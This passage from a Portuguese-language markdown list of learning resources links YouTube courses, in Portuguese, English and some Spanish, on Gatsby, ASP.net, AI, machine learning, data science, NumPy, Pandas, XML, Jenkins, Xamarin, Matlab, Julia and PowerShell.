- [Gatsby - Full Tutorial for Beginners](https://www.youtube.com/watch?v=mHFAM0CXviE&ab_channel=freeCodeCamp.org)
- [Can We Really Make a Gatsby Portfolio in 10 Minutes?](https://www.youtube.com/watch?v=JxB_MY7IkME&ab_channel=zachOSTech)
- [GatsbyJS e WordPress: o básico](https://www.youtube.com/watch?v=W48eHfkwtlo&ab_channel=FelipeEliaWP)
- [Webinar | The All New Gatsby 5](https://www.youtube.com/watch?v=X_9yDpPpp2w&ab_channel=Gatsby)
- [What is Gatsby JS and Why Use It](https://www.youtube.com/watch?v=GuvAMcsoreI&ab_channel=ZacGordon)
- [The Great Gatsby Bootcamp - Full Gatsby.js Tutorial Course](https://www.youtube.com/watch?v=kzWIUX3CpuI&ab_channel=freeCodeCamp.org)
- [Gatsby JS Crash Course](https://www.youtube.com/watch?v=6YhqQ2ZW1sc&ab_channel=TraversyMedia)
## 🐂 Sites e cursos para aprender ASP.net
> Cursos para aprender ASP.net em Português
- [Curso completo ASP.net Core](https://www.youtube.com/watch?v=r6AcjjNvI8w&list=PL_yq9hmeKAk_5bdDzHBdqe5LGrZMxawOl&ab_channel=HenriqueEduardoSouza)
- [Bem-vindos ao ASP.net](https://www.youtube.com/watch?v=Z3DU-Jpft74&list=PLXik_5Br-zO-5SRVrpNHnP4uVMBL2Gqz2&ab_channel=Jo%C3%A3oRibeiro)
- [Projeto do curso de .NET Core C# | Mod 01 - Aula 01](https://www.youtube.com/watch?v=q1sF6D7vKPE&list=PLs3yd28pfby7WLEdA7GXey47cKZKMrcwS&ab_channel=MidoriFukami)
- [ASP.Net MVC - C# - Criando uma aplicação do Zero](https://www.youtube.com/watch?v=-v0sfER0po8&list=PLJ0IKu7KZpCQKdwRbU7HfXW3raImmghWZ&ab_channel=ProgramadorTech)
> Cursos para aprender ASP.net em Inglês
- [ASP.NET - Introduction](https://www.youtube.com/watch?v=ccXz-oIrFe0&list=PLWPirh4EWFpGdA3VPS9umbvP6YGT3hUU9&ab_channel=TutorialsPoint)
- [What is ASP.NET Part 1](https://www.youtube.com/watch?v=3AYoipyqOkQ&list=PL6n9fhu94yhXQS_p1i-HLIftB9Y7Vnxlo&ab_channel=kudvenkat)
- [ASP.NET Core 6 Full Course: ASP.NET Core MVC Tutorial](https://www.youtube.com/watch?v=XE0EcyEKdq4&ab_channel=ScholarHatByDotNetTricks)
- [ASP.NET Microservices – Full Course for Beginners](https://www.youtube.com/watch?v=CqCDOosvZIk&ab_channel=freeCodeCamp.org)
- [ASP.NET Core MVC Course (.NET 5)](https://www.youtube.com/watch?v=Pi46L7UYP8I&ab_channel=freeCodeCamp.org)
- [Complete 3 Hour ASP NET 6.0 and Entity Framework Core Course!](https://www.youtube.com/watch?v=7d2UMAIgOLQ&ab_channel=tutorialsEU)
## 🐖 Sites e cursos para aprender Inteligência Artificial
> Cursos para aprender Inteligência Artificial em Português
- [Inteligência Artificial: Aula 0 - Introdução](https://www.youtube.com/watch?v=m1-Hc5-H22M&list=PL4OAe-tL47sY1OgDs7__GJW8xBpPEeNfC&ab_channel=Zurubabel)
- [Introdução a Inteligência Artificial](https://www.youtube.com/watch?v=AotU3yIExqI&list=PL-LIyhnUCPkGdj9umESeimOfWctErNVzH&ab_channel=PROF.FABIOSANTOS)
- [Curso de Inteligência Artificial - O que é Inteligência Artificial](https://www.youtube.com/watch?v=82VyhCNpxYA&list=PL5EmR7zuTn_Z912YaqukK1SWfY5o2xrYA&ab_channel=davestecnologia)
- [Introdução às Redes Neurais Artificiais - Apresentação do Curso - Aula #0](https://www.youtube.com/watch?v=OQwxeFSJ_Q4&list=PLZj-vsMJRNhprMuIaE6HXmOkHh0NEEMtL&ab_channel=Intelig%C3%AAnciaArtificialnaPr%C3%A1tica)
- [Introdução à IA #1: Introdução](https://www.youtube.com/watch?v=ucoFLlasfIo&list=PLBqjnKyN75dQiW0WJtvNoBESF5q8OWdge&ab_channel=AlgoritmoZ)
- [Inteligencia Artificial com Unity - Aula 01 - Desenvolvimento de Jogos](https://www.youtube.com/watch?v=Ins6YXFJU7M&list=PLxNM4ef1BpxirZvCvdzMbFJrAWSWzGpIC&ab_channel=PortalHugoCursos)
- [Inteligência Artificial na Prática com Python [Projeto Flappy Bird - Aula 1 de 4]](https://www.youtube.com/watch?v=GMDb2jtzKZQ&list=PLpdAy0tYrnKyVQDckS5IDB24QrSap2u8y&ab_channel=HashtagPrograma%C3%A7%C3%A3o)
> Cursos para aprender Inteligência Artificial em Inglês
- [Artificial Intelligence Full Course | Artificial Intelligence Tutorial for Beginners | Edureka](https://www.youtube.com/watch?v=JMUxmLyrhSk&ab_channel=edureka%21)
- [Artificial Intelligence | What is AI | Introduction to Artificial Intelligence | Edureka](https://www.youtube.com/watch?v=4jmsHaJ7xEA&list=PL9ooVrP1hQOGHNaCT7_fwe9AabjZI1RjI&ab_channel=edureka%21)
- [Overview Artificial Intelligence Course | Stanford CS221: Learn AI (Autumn 2019)](https://www.youtube.com/watch?v=J8Eh7RqggsU&list=PLoROMvodv4rO1NB9TD4iUZ3qghGEGtqNX&ab_channel=StanfordOnline)
## 🦀 Sites e cursos para aprender Machine Learning
> Cursos para aprender Machine Learning em Português
- [Preencher Dados que Faltam da Galera do SVBR - Machine Learning 01](https://www.youtube.com/watch?v=p_SmODmFRUw&list=PL-t7zzWJWPtzhZtI-bWWHFtCfxtjmBdIW&ab_channel=UniversoDiscreto)
- [O que é Inteligência Artificial?](https://www.youtube.com/watch?v=ID5Ui22F8HQ&list=PLyqOvdQmGdTSqkutrKDaVJlEv-ui1MyK4&ab_channel=Did%C3%A1ticaTech)
- [O que é MACHINE LEARNING? Introdução ao APRENDIZADO DE MÁQUINA | Machine Learning #1](https://www.youtube.com/watch?v=u8xgqvk16EA&list=PL5TJqBvpXQv5CBxLkdqmou_86syFK7U3Q&ab_channel=Programa%C3%A7%C3%A3oDin%C3%A2mica)
- [Python para Machine Learning (Curso - Aula 1)](https://www.youtube.com/watch?v=MmSXHCxDwBs&list=PLyqOvdQmGdTR46HUxDA6Ymv4DGsIjvTQ-&ab_channel=Did%C3%A1ticaTech)
- [Introdução ao Machine Learning (ML de Zero a 100, parte 1)](https://www.youtube.com/watch?v=t5z5lyrb-7s&ab_channel=TensorFlow)
- [Curso de Machine Learning Em Português - Introdução da Primeira Parte](https://www.youtube.com/watch?v=pKc1J4RB_VQ&list=PL4OAe-tL47sb3xdFBVXs2w1BA2LRN5JU2&ab_channel=Zurubabel)
> Cursos para aprender Machine Learning em Inglês
- [MarI/O - Machine Learning for Video Games](https://www.youtube.com/watch?v=qv6UVOQ0F44&ab_channel=SethBling)
- [Machine Learning Course for Beginners](https://www.youtube.com/watch?v=NWONeJKn6kc&ab_channel=freeCodeCamp.org)
- [The Best (Free) Machine Learning Courses Online!](https://www.youtube.com/watch?v=7t5MJ38NZ8E&ab_channel=CharlesWeill)
- [Machine Learning for Everybody – Full Course](https://www.youtube.com/watch?v=i_LwzRVP7bg&ab_channel=freeCodeCamp.org)
- [Best Machine Learning Courses on Coursera](https://www.youtube.com/watch?v=A4OVjWeVb10&ab_channel=AlexTheAnalyst)
- [PyTorch for Deep Learning & Machine Learning – Full Course](https://www.youtube.com/watch?v=V_xro1bcAuA&ab_channel=freeCodeCamp.org)
## 🦑 Sites e cursos para aprender Data Science
> Cursos para aprender Data Science em Português
- [Data Science: Introdução a Ciência de Dados (Primeira aula prática programando em Python)](https://www.youtube.com/watch?v=F608hzn_ygo&ab_channel=FilipeDeschamps)
- [Os 3 Melhores Cursos de Data Science que fiz no Coursera](https://www.youtube.com/watch?v=r6nN8OQ-6co&ab_channel=MarioFilho)
- [Como se Tornar um Cientista de Dados de Sucesso - Vlog #105](https://www.youtube.com/watch?v=-vawLSNdo-A&ab_channel=C%C3%B3digoFonteTV)
- [Como eu aprenderia Data Science em 2022 (se começasse do zero) - Data Hackers](https://www.youtube.com/watch?v=K2Vu6E5Ybmo&ab_channel=DataHackers)
- [Curso de Ciência de Dados (CCDD) 000 - Introdução ao Curso](https://www.youtube.com/watch?v=CiUumyrp7Ow&list=PLfCKf0-awunPFkWOKWNaXB_ndaHBlJ4QQ&ab_channel=Ignor%C3%A2nciaZero)
- [Python para Data Science - #0 Apresentação e Ambiente](https://www.youtube.com/watch?v=WUuiEEuvgFE&list=PL3ZslI15yo2qCEmnYOa2sq6VQOzQ2CFhj&ab_channel=xavecoding)
- [Mini-Curso: Introdução à Big Data e Data Science - Aula 1 - O que é Big Data](https://www.youtube.com/watch?v=8D20ZNTc-xA&list=PLrakQQfctUYUDaEsft9avwjbvemIEwiRQ&ab_channel=DiegoNogare)
- [O que eu faria se tivesse que começar Ciência de Dados em 2022? | Comunidade DS | Meigarom Lopes](https://www.youtube.com/watch?v=0vbWEU9J3xs&ab_channel=SejaUmDataScientist)
- [O que eu faria se tivesse que começar em Data Science hoje.](https://www.youtube.com/watch?v=VlYDWOfiFuc&ab_channel=SejaUmDataScientist)
- [Aprenda tudo sobre Data Science, seus primeiros passos](https://www.youtube.com/watch?v=IQdISZCosAE&ab_channel=AluraCursosOnline)
> Cursos para aprender Data Science em Inglês
- [Top Courses to Learn Data Science Skills FAST!](https://www.youtube.com/watch?v=ho9vNL4MYZ8&ab_channel=ThuVudataanalytics)
- [Data Science Full Course - Learn Data Science in 10 Hours | Data Science For Beginners | Edureka](https://www.youtube.com/watch?v=-ETQ97mXXF0&ab_channel=edureka%21)
- [What is Data Science? | Free Data Science Course | Data Science for Beginners | codebasics](https://www.youtube.com/watch?v=JL_grPUnXzY&list=PLeo1K3hjS3us_ELKYSj_Fth2tIEkdKXvV&ab_channel=codebasics)
- [Data Science Roadmap 2023 | Learn Data Science Skills in 6 Months](https://www.youtube.com/watch?v=eaFaD_IBYW4&ab_channel=codebasics)
- [Learn Data Science Tutorial - Full Course for Beginners](https://www.youtube.com/watch?v=ua-CiDNNj30&ab_channel=freeCodeCamp.org)
- [Reinforcement Learning in 3 Hours | Full Course using Python](https://www.youtube.com/watch?v=Mut_u40Sqz4&list=PLgNJO2hghbmid6heTu2Ar68CzJ344nUHy&ab_channel=NicholasRenotte)
- [Statistics for Data Science | Probability and Statistics | Statistics Tutorial | Ph.D. (Stanford)](https://www.youtube.com/watch?v=Vfo5le26IhY&list=PLlgLmuG_KgbaXMKcISC-fdz7HUn1oKr9i&ab_channel=GreatLearning)
- [How I Would Learn Data Science in 2022](https://www.youtube.com/watch?v=Rt6eb9VOFII&ab_channel=RecallbyDataiku)
- [How I Would NOT Learn Data Science in 2023.](https://www.youtube.com/watch?v=t6CD1EwU5kc&ab_channel=KenJee)
- [O que realmente é Ciência de Dados? Explicado por um Cientista de Dados](https://www.youtube.com/watch?v=xC-c7E5PK0Y&ab_channel=JomaTech)
- [Statistics - A Full University Course on Data Science Basics](https://www.youtube.com/watch?v=xxpc-HPKN28&ab_channel=freeCodeCamp.org)
- [A Day In The Life Of A Data Scientist](https://www.youtube.com/watch?v=Ck0ozfJV9-g&ab_channel=JomaTech)
- [Data Science In 5 Minutes | Data Science For Beginners | What Is Data Science? | Simplilearn](https://www.youtube.com/watch?v=X3paOmcrTjQ&ab_channel=Simplilearn)
- [Build 12 Data Science Apps with Python and Streamlit - Full Course](https://www.youtube.com/watch?v=JwSS70SZdyM&ab_channel=freeCodeCamp.org)
- [Python for Data Science - Course for Beginners (Learn Python, Pandas, NumPy, Matplotlib)](https://www.youtube.com/watch?v=LHBE6Q9XlzI&ab_channel=freeCodeCamp.org)
## 🐙 Sites e cursos para aprender NumPy
> Cursos para aprender NumPy em Português
- [Curso Grátis - Se torne um Analista de Dados](https://www.youtube.com/watch?v=5kepfx0RquY&list=PL3Fmwz_E1hXRWxIkP843DiDf0ZeqgftTy&ab_channel=Gera%C3%A7%C3%A3oAnal%C3%ADtica)
- [Como Sair do Zero com a Biblioteca Numpy no Python](https://www.youtube.com/watch?v=LZDZ0AZmWHI&ab_channel=HashtagPrograma%C3%A7%C3%A3o)
> Cursos para aprender NumPy em Inglês
- [NumPy Full Python Course - Data Science Fundamentals](https://www.youtube.com/watch?v=4c_mwnYdbhQ&ab_channel=NeuralNine)
- [Python for Data Science - Course for Beginners (Learn Python, Pandas, NumPy, Matplotlib)](https://www.youtube.com/watch?v=LHBE6Q9XlzI&ab_channel=freeCodeCamp.org)
- [Data Analysis with Python Course - Numpy, Pandas, Data Visualization](https://www.youtube.com/watch?v=GPVsHOlRBBI&ab_channel=freeCodeCamp.org)
- [Introduction to NumPy Arrays for Beginners - Learn NumPy Series](https://www.youtube.com/watch?v=9fcTq8PDWWA&list=PLc_Ps3DdrcTuf3e-BBpDv8r9jbOB5Wdv-&ab_channel=DerrickSherrill)
- [NumPy Python - What is NumPy in Python | Numpy Python tutorial in Hindi](https://www.youtube.com/watch?v=ZaKzw9tULeM&list=PLjVLYmrlmjGfgBKkIFBkMNGG7qyRfo00W&ab_channel=WsCubeTech)
- [Introduction to Numpy and Scipy | Python Tutorials](https://www.youtube.com/watch?v=NVTWjd_UpzM&list=PLzgPDYo_3xukqLLjNeuCxj4CwvkJin03Z&ab_channel=Amulya%27sAcademy)
- [Intro To Numpy - Numpy For Machine Learning 1](https://www.youtube.com/watch?v=gnKbAAVUzro&list=PLCC34OHNcOtpalASMlX2HHdsLNipyyhbK&ab_channel=Codemy.com)
- [HOW TO INSTALL NUMPY - PYTHON PROGRAMMING](https://www.youtube.com/watch?v=8jBY5ior4W4&list=PLLOxZwkBK52BS9QmfiuJAGSoVikI5-1hN&ab_channel=SundeepSaradhiKanthety)
- [NumPy Explained - Full Course (3 Hrs)](https://www.youtube.com/watch?v=eClQWW_gbFk&ab_channel=GormAnalysis)
- [Python NumPy Tutorial for Beginners](https://www.youtube.com/watch?v=QUT1VHiLmmI&ab_channel=freeCodeCamp.org)
- [Numpy Full Course | Numpy Tutorial | Python Tutorial For Beginners | Python Training | Simplilearn](https://www.youtube.com/watch?v=j31ah5Qa4QI&ab_channel=Simplilearn)
- [Numpy Tutorial | Python Numpy Tutorial | Intellipaat](https://www.youtube.com/watch?v=DI8wg3SRV90&ab_channel=Intellipaat)
- [Data Analysis with Python - Full Course for Beginners (Numpy, Pandas, Matplotlib, Seaborn)](https://www.youtube.com/watch?v=r-uOLxNrNk8&ab_channel=freeCodeCamp.org)
- [NumPy Tutorial : Numpy Full Course](https://www.youtube.com/watch?v=8Y0qQEh7dJg&ab_channel=DerekBanas)
- [Learn NUMPY in 5 minutes - BEST Python Library!](https://www.youtube.com/watch?v=xECXZ3tyONo&ab_channel=PythonProgrammer)
- [Python Numpy Full Tutorial For Beginners | Numpy Full Course in 4 Hours](https://www.youtube.com/watch?v=-TYSM0CDA4c&ab_channel=WsCubeTech)
- [NumPy for Beginners in 15 minutes | Python Crash Course](https://www.youtube.com/watch?v=uRsE5WGiKWo&ab_channel=NicholasRenotte)
## 🦃 Sites e cursos para aprender Pandas
> Cursos para aprender Pandas em Português
- [Curso de Pandas - Python - Introdução ao curso (versão ago/2020)](https://www.youtube.com/watch?v=1ua6uksg6wg&list=PL4OAe-tL47sa1McMctk5pdPd5eTAp3drk&ab_channel=Zurubabel)
- [Introdução ao Pandas no Python - [SAIA DO ZERO EM 1 AULA]](https://www.youtube.com/watch?v=C0aj3FjN5e0&ab_channel=HashtagPrograma%C3%A7%C3%A3o)
- [Curso Grátis - Se torne um Analista de Dados](https://www.youtube.com/watch?v=5kepfx0RquY&list=PL3Fmwz_E1hXRWxIkP843DiDf0ZeqgftTy&ab_channel=Gera%C3%A7%C3%A3oAnal%C3%ADtica)
- [Manipulação de Dados em Python/Pandas - #00 Apresentação e Ambiente](https://www.youtube.com/watch?v=hD0uJln4S2Y&list=PL3ZslI15yo2pfkf7EGNR14xTwe-wZ2bNX&ab_channel=xavecoding)
- [Curso para principiantes de Pandas para análisis de datos desde cero paso a paso en Python](https://www.youtube.com/watch?v=1CIZFu_qWvk&list=PLjdo6jnQHJFYUxftilqXD1pgzq9E9yJze&ab_channel=EscuelaDeBayes)
- [Curso rápido completo de Pandas - Parte 1](https://www.youtube.com/watch?v=6vpDSD1wchA&ab_channel=UniversidadedosDados)
- [Pandas do ZERO a ANÁLISE de DADOS | Dica de Pandas Python para Análise de Dados](https://www.youtube.com/watch?v=wnGsAOPKjLo&ab_channel=Programa%C3%A7%C3%A3oDin%C3%A2mica)
- [Pandas (A Lib "Delicinha" para Data Science) - Dicionário do Programador](https://www.youtube.com/watch?v=yCtiqMRt4TQ&ab_channel=C%C3%B3digoFonteTV)
> Cursos para aprender Pandas em Inglês
- [Introduction to Pandas](https://www.youtube.com/watch?v=t4yBm9agYWo&list=PLFAYD0dt5xCxdKfIR3ZX3k07qrqEjUZSO&ab_channel=MachineLearningPlus)
- [Pandas: free courses, books and learning resources.](https://www.youtube.com/watch?v=W0nC1yiL-VM&ab_channel=PythonProgrammer)
- [Python Pandas Tutorial (Part 1): Getting Started with Data Analysis - Installation and Loading Data](https://www.youtube.com/watch?v=ZyhVh-qRZPA&list=PL-osiE80TeTsWmV9i9c58mdDCSskIFdDS&ab_channel=CoreySchafer)
- [Python Pandas Tutorial 1. What is Pandas python? Introduction and Installation](https://www.youtube.com/watch?v=CmorAWRsCAw&list=PLeo1K3hjS3uuASpe-1LjfG5f14Bnozjwy&ab_channel=codebasics)
- [Data Analysis with Python Course - Numpy, Pandas, Data Visualization](https://www.youtube.com/watch?v=GPVsHOlRBBI&ab_channel=freeCodeCamp.org)
- [Data Analytics with Python](https://www.youtube.com/watch?v=4SJ7bEILPJk&list=PLLy_2iUCG87CNafffzNZPVa9rW-QmOmEv&ab_channel=IITRoorkeeJuly2018)
- [Install Jupyter Notebook and Pandas - Pandas For Machine Learning 1](https://www.youtube.com/watch?v=fA0Ty562y8A&list=PLCC34OHNcOtqSz7Ke7kaYRf9CfviJgO55&ab_channel=Codemy.com)
- [Pandas Tutorial : Pandas Full Course](https://www.youtube.com/watch?v=PcvsOaixUh8&ab_channel=DerekBanas)
- [Data Analysis with Python - Full Course for Beginners (Numpy, Pandas, Matplotlib, Seaborn)](https://www.youtube.com/watch?v=r-uOLxNrNk8&ab_channel=freeCodeCamp.org)
- [Complete Python Pandas Data Science Tutorial! (Reading CSV/Excel files, Sorting, Filtering, Groupby)](https://www.youtube.com/watch?v=vmEHCJofslg&ab_channel=KeithGalli)
- [Pandas for Data Science in 20 Minutes | Python Crash Course](https://www.youtube.com/watch?v=tRKeLrwfUgU&ab_channel=NicholasRenotte)
- [Learn pandas in 4 hours with this great (free) Kaggle course. Python for Data Science](https://www.youtube.com/watch?v=GU2mcHjLWlE&ab_channel=PythonProgrammer)
## 🐟 Sites e cursos para aprender XML
> Cursos para aprender XML em Português
- [XML - Dicionário do Programador](https://www.youtube.com/watch?v=h7W0UuRd4fc&ab_channel=C%C3%B3digoFonteTV)
- [Curso de XML - Aula 01](https://www.youtube.com/watch?v=zqg38jy5yWQ&list=PLC1DD2110DBABA0E8&ab_channel=MarcosSouza)
- [XML - Dicionário de Informática](https://www.youtube.com/watch?v=cwuosmEJuUQ&ab_channel=Dicion%C3%A1riodeInform%C3%A1tica)
- [XML: Conceitos básicos](https://www.youtube.com/watch?v=LL3nWI2pM8E&ab_channel=Rog%C3%A9rioAra%C3%BAjo)
> Cursos para aprender XML em Inglês
- [What is XML | XML Beginner Tutorial | Learn XML with Demo in 10 min](https://www.youtube.com/watch?v=1JblVElt5K0&list=PLhW3qG5bs-L9DloLUPwC3GdFimY5Ce_gS&ab_channel=AutomationStepbyStep)
- [XML Tutorial 1 Introduction](https://www.youtube.com/watch?v=YX-Arx4TBmU&list=PLbhnirpS9esXfdfZ0mapojvDycQBAIx-C&ab_channel=mrfizzlebutt)
- [XML Tutorial for Beginners Theory](https://www.youtube.com/watch?v=n-y-YHVZSwk&list=PLmdFG1KSZhosqwkP-BCtcMq0KubZ4v1Cm&ab_channel=Telusko)
- [XML Tutorial For Beginners | XML Tutorial | What Is XML? | Learn XML For Beginners | Simplilearn](https://www.youtube.com/watch?v=E-NciVkZFVs&ab_channel=Simplilearn)
## 🦢 Sites e cursos para aprender Jenkins
> Cursos para aprender Jenkins em Português
- [O básico de Pipelines CI/CD com Jenkins](https://www.youtube.com/watch?v=O6y27_Ol25g&ab_channel=Fabr%C3%ADcioVeronez)
- [Curso de Jenkins - 01 Instalação](https://www.youtube.com/watch?v=8iLRsb2gXXY&ab_channel=MarceloGomesdePaula)
- [Jenkins: O mínimo que você precisa saber](https://www.youtube.com/watch?v=8OfhS5f7jIY&ab_channel=FullCycle)
> Cursos para aprender Jenkins em Inglês
- [Jenkins Full Course | Jenkins Tutorial For Beginners | Jenkins Tutorial | Simplilearn](https://www.youtube.com/watch?v=FX322RVNGj4&ab_channel=Simplilearn)
- [Learn Jenkins! Complete Jenkins Course - Zero to Hero](https://www.youtube.com/watch?v=6YZvp2GwT0A&ab_channel=DevOpsJourney)
- [Jenkins Tutorial – How to Deploy a Test Server with Docker + Linux (Full Course)](https://www.youtube.com/watch?v=f4idgaq2VqA&ab_channel=freeCodeCamp.org)
- [What Is Jenkins? | What Is Jenkins And How It Works? | Jenkins Tutorial For Beginners | Simplilearn](https://www.youtube.com/watch?v=LFDrDnKPOTg&ab_channel=Simplilearn)
- [Complete Jenkins Pipeline Tutorial | Jenkinsfile explained](https://www.youtube.com/watch?v=7KCS70sCoK0&ab_channel=TechWorldwithNana)
- [Jenkins pipeline// Advanced Tutorial // May2020- Session 1 (Part 1 Out 3 ) by DevOpsSchool](https://www.youtube.com/watch?v=v0nZnp0FUzs&list=PL0xeHY_ImQVXcCAu0PSdWKERIu4xLGo7N&ab_channel=AiOps%26MLOpsSchool)
- [Deployment Overview | Jenkins](https://www.youtube.com/watch?v=813eFgtceio&list=PLRVv68RjliSfxKab5wJ3dYW7ZtlMPBoJ4&ab_channel=KubernetesAWSJenkinsCafe)
- [Part 1 - An Introduction to Jenkins 2.0 for Build+Deploy+Test](https://www.youtube.com/watch?v=HZOII16W0oY&list=PL6tu16kXT9PqIe2b0BGul-cXbmwGt7Ihw&ab_channel=ExecuteAutomation)
- [Jenkins Beginner Tutorial 1 - Introduction and Getting Started](https://www.youtube.com/watch?v=89yWXXIOisk&list=PLhW3qG5bs-L_ZCOA4zNPSoGbnVQ-rp_dG&ab_channel=AutomationStepbyStep)
- [Jenkins Full Course | Jenkins Tutorial For Beginners | Learn Jenkins Step By Step | Simplilearn](https://www.youtube.com/watch?v=MayMkFCkzj4&ab_channel=Simplilearn)
- [Jenkins Full Course in 4 Hours | Jenkins Tutorial For Beginners | DevOps Training | Edureka](https://www.youtube.com/watch?v=3a8KsB5wJDE&ab_channel=edureka%21)
- [Jenkins Tutorial For Beginners 1 - Introduction to Jenkins](https://www.youtube.com/watch?v=yz3tyeA3Fe0&list=PLS1QulWo1RIbY8xXPqz6ad_sNHkIP3IXI&ab_channel=ProgrammingKnowledge)
- [Jenkins 2021 Masterclass | Step by Step for Beginners | Interview Questions | Raghav Pal |](https://www.youtube.com/watch?v=woMAXn4e8NA&ab_channel=AutomationStepbyStep)
- [Jenkins Tutorial | Jenkins Course For Developers and DevOps](https://www.youtube.com/watch?v=BvUkXrAAqjE&ab_channel=ProgrammingKnowledge)
- [Free Jenkins CI course for beginners | Learn Jenkins CI / CD tool in one video.](https://www.youtube.com/watch?v=zhDTF_vjkuQ&ab_channel=TravelsCode)
## 🐩 Sites e cursos para aprender Xamarin
> Cursos para aprender Xamarin em Português
- [Curso de C# Xamarin - Aula 01 - Android, IOS e Windows Phone com C#](https://www.youtube.com/watch?v=d2tBuQEZtH8&list=PLxNM4ef1BpxjmpXgb-_0W6hUxjbgbI0PQ&ab_channel=PortalHugoCursos)
- [Xamarin (o concorrente do Flutter e React Native) - Dicionário do Programador](https://www.youtube.com/watch?v=rtuywS2fG2Y&ab_channel=C%C3%B3digoFonteTV)
> Cursos para aprender Xamarin em Inglês
- [Kill Kotlin and Swift, Use C# Instead - Welcome to Xamarin.Forms!](https://www.youtube.com/watch?v=9eM9T5svYHw&list=PLdkt3RKz_b0zd3FHevP5Bd2vZYIwq12pF&ab_channel=EduardoRosas)
- [Xamarin Android Tutorial - Linear Layout](https://www.youtube.com/watch?v=Wj-WT4uWlKA&list=PLaoF-xhnnrRVglZztNl99ih76fvBOLMe8&ab_channel=EDMTDev)
- [Xamarin Forms #0- Introduction](https://www.youtube.com/watch?v=e6LeoYD1A1I&list=PL0CKdD7TV8pG0kNyfWO5LFqeU6J6Zj_49&ab_channel=Mikaelson)
- [Xamarin Forms Tutorial: Build Native Mobile Apps with C#](https://www.youtube.com/watch?v=93ZU6j59wL4&ab_channel=ProgrammingwithMosh)
## 🦁 Sites e cursos para aprender Matlab
> Cursos para aprender Matlab em Português
- [Curso de MATLAB #01 - Introdução](https://www.youtube.com/watch?v=da0qJnleaEQ&list=PLE1UtdMhwaEobcUPjpo27o5HxeBSYjLEs&ab_channel=2001Engenharia)
- [Aula 01- Apresentação do curso e do Ambiente do MATLAB](https://www.youtube.com/watch?v=XyNI0-DP-0o&list=PLJoR6gvpdNEZLB-Epf9csRTLhubXSnrzs&ab_channel=CarlosRonyheltonSantanadeOliveira)
- [Curso de MATLAB - Introdução](https://www.youtube.com/watch?v=88NQiUU6khY&list=PLlx81VEju6qAUUSE3M6NlFoFnrSSqR59-&ab_channel=LASI-)
- [Introdução ao Matlab para Engenharia # 001](https://www.youtube.com/watch?v=-8lHG5lX4Fg&list=PLALkrMtuSoe-0mVxznaj9NKosBUFKL7pr&ab_channel=SergioA.Casta%C3%B1oGiraldo-Brasil)
- [Apresentação e Estrutura do Curso - Curso de Matlab - PETEE UFMG](https://www.youtube.com/watch?v=3366RoF1WaA&list=PL73kW0L8uzCK2qFoaY4Rur2FUetnNoUze&ab_channel=PETEEUFMG)
> Cursos para aprender Matlab em Inglês
- [The Complete MATLAB Course: Beginner to Advanced!](https://www.youtube.com/watch?v=T_ekAD7U-wU&ab_channel=JosephDelgadillo)
- [Matlab Online Tutorial - 01 - The User Interface, Part 1](https://www.youtube.com/watch?v=w1cnxqBaljA&list=PLnVYEpTNGNtX6FcQm90I0WXdvhoEJPp3p&ab_channel=MathandScience)
- [Learn MATLAB Episode #1: Installation & Resources](https://www.youtube.com/watch?v=nmyJTiZ3NeE&list=PLYmlEoSHldN4bz5WY7e0OvXQ90E_xUOmz&ab_channel=JosephDelgadillo)
- [MATLAB Crash Course for Beginners](https://www.youtube.com/watch?v=7f50sQYjNRA&ab_channel=freeCodeCamp.org)
- [Lesson 1: 1. Introduction (Old version)](https://www.youtube.com/watch?v=6iN56l7dEMY&list=PLYdXvSx87cgRJfv6gZl7GjAs0GNvyg-uS&ab_channel=FitzleLLC)
- [What is MATLAB? & How It Works | MATLAB Features & Types | MATLAB Tutorial for Beginners](https://www.youtube.com/watch?v=0x4JhS1YpzI&list=PLjVLYmrlmjGcNZrPa9bRg0JVlcxLX4Mu9&ab_channel=WsCubeTech)
## 🦨 Sites e cursos para aprender Julia
> Cursos para aprender Julia em Português
- [Julia Lang (A Mistura de Linguagens que Deu Certo) - Dicionário do Programador](https://www.youtube.com/watch?v=Xzdg9czOxD8&ab_channel=C%C3%B3digoFonteTV)
- [Uma LINGUAGEM para CIÊNCIA de DADOS? | Handshake #24 | Programe na Linguagem Julia](https://www.youtube.com/watch?v=Tj0CUAyxjck&list=PL5TJqBvpXQv4cAynxaIyclmpZ95g-gtqQ&ab_channel=Programa%C3%A7%C3%A3oDin%C3%A2mica)
- [Linguagem de Programação Julia - Primeiras Impressões](https://www.youtube.com/watch?v=G2tYt3IKbXA&ab_channel=CaioDallaqua)
- [Estrutura Básica | Linguagem Julia](https://www.youtube.com/watch?v=h0ubpGRtBUI&ab_channel=FilipeBraida)
- [Tutoriais de Julia em Português - Super Tutorial do Básico](https://www.youtube.com/watch?v=Gmm5voUQaHw&ab_channel=AbelSiqueira)
> Cursos para aprender Julia em Inglês
- [Julia Tutorial | Julia Data Science Basic Full Course [Complete Tutorial] for Beginners [2019]](https://www.youtube.com/watch?v=lwj-1mclq0U&ab_channel=AbhishekAgarrwal)
- [A Gentle Introduction to Julia](https://www.youtube.com/watch?v=4igzy3bGVkQ&list=PLP8iPy9hna6SCcFv3FvY_qjAmtTsNYHQE&ab_channel=TheJuliaProgrammingLanguage)
- [The Continuing Advancements of Scientific Machine Learning (SciML) | 2022 DigiWell Julia Seminar](https://www.youtube.com/watch?v=yHiyJQdWBY8&ab_channel=TheJuliaProgrammingLanguage)
- [Julia for Data Science - Video 0: Welcome, by Dr. Huda Nassar (for JuliaAcademy.com)](https://www.youtube.com/watch?v=AXgLWumAOhk&list=PLP8iPy9hna6QuDTt11Xxonnfal91JhqjO&ab_channel=TheJuliaProgrammingLanguage)
- [Julia in 100 Seconds](https://www.youtube.com/watch?v=JYs_94znYy0&ab_channel=Fireship)
- [JULIA COURSE FOR COMPLETE BEGINERS](https://www.youtube.com/watch?v=2apwJKYOdZo&ab_channel=F-Course)
## 🐨 Sites e cursos para aprender PowerShell
> Cursos para aprender Powershell em Português
- [PowerShell - Fundamentos](https://www.youtube.com/playlist?list=PLO_mlVzHgDw3EIKrT5rma_rmC4Lcc7ihT)
- [Tutoriais de Windows PowerShell](https://www.youtube.com/playlist?list=PLucm8g_ezqNpdK1sHdiDC3T8VMANcT5WZ)
- [PowerShell - ProfessorRamos](https://www.youtube.com/playlist?list=PL35Zp8zig6slB_EaLbwKP57L9weBfICtS)
- [Curso Windows PowerShell - Bóson Treinamentos](https://www.youtube.com/playlist?list=PLs8UzdP13z6oEUoENIGkBQf1b2AtZcyoB)
> Cursos para aprender Powershell em Espanhol
- [Curso PowerShell 2022](https://www.youtube.com/playlist?list=PLn98b7UTDjb1h5_LCHXyeJR8nrPeTaSBM)
